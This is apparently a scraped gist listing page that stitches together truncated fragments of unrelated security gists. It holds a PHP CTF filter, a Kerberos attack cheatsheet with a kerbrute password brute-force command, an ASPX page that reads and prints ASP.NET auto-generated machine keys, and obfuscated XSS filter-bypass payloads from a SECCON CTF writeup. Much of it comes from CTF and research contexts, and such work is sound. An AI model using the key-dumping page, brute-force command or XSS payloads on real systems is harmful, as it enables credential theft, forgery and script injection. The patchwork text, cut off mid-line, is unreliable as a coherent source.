function is_valid($str) {
$banword = [
// dangerous chars
// " % ' * + / < = > \ _ ` ~ -
"[\"%'*+\\/<=>\\\\_`~-]",
// whitespace chars
terjanq
/ harekaze19_solutions.md
Last active
August 9, 2019 18:55
Harekaze 2019 writeups by terjanq (https://twitter.com/terjanq)
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
irsdl
/ machineKeyFinder.aspx
Last active
June 17, 2024 03:42
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |
Blog post: https://segmentfault.com/a/1190000017136059
tyage
/ bonsai-xss.js
Last active
October 23, 2020 03:32
SECCON CTF 2014 Online Qualifications, XSS Bonsai writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ";hoge14='constructorhoge14'.slice(84645-84645,84656-84645);hoge15='alerthoge14'.slice(84645-84645,84650-84645);hoge16='XSShoge14'.slice(84645-84645,84648-84645);[][hoge14][hoge14](hoge15+'(\''+hoge16+'\')')()// | |
| \";hoge17='constructorhoge17'.substr(45998-45998,46009-45998);hoge18='alerthoge17'.substr(45998-45998,46003-45998);hoge19='XSShoge17'.substr(45998-45998,46001-45998);[][hoge17][hoge17](hoge18+'(\''+hoge19+'\')')()// | |
| ',(hoge20='constructorhogee'.replace('hogee',''),hoge21='alerthogee'.replace('hogee',''),hoge22='XSShogee'.replace('hogee',''),[][hoge20][hoge20](hoge21+'(\''+hoge22+'\')')()),' | |
| ")};hoge30=88831-88831;hoge31='cccchoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'nnnnhoge30'.split('')[hoge30]+'sssshoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'uuuuhoge30'.split('')[hoge30]+'cccchoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30];hoge32='aaaahoge30'.split('')[hoge30]+'llllhoge |